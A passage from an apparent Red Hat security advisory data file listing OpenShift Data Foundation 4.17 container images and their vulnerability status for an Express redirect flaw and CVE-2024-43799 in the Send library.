"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "express: Improper Input Handling in Express Redirects", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", 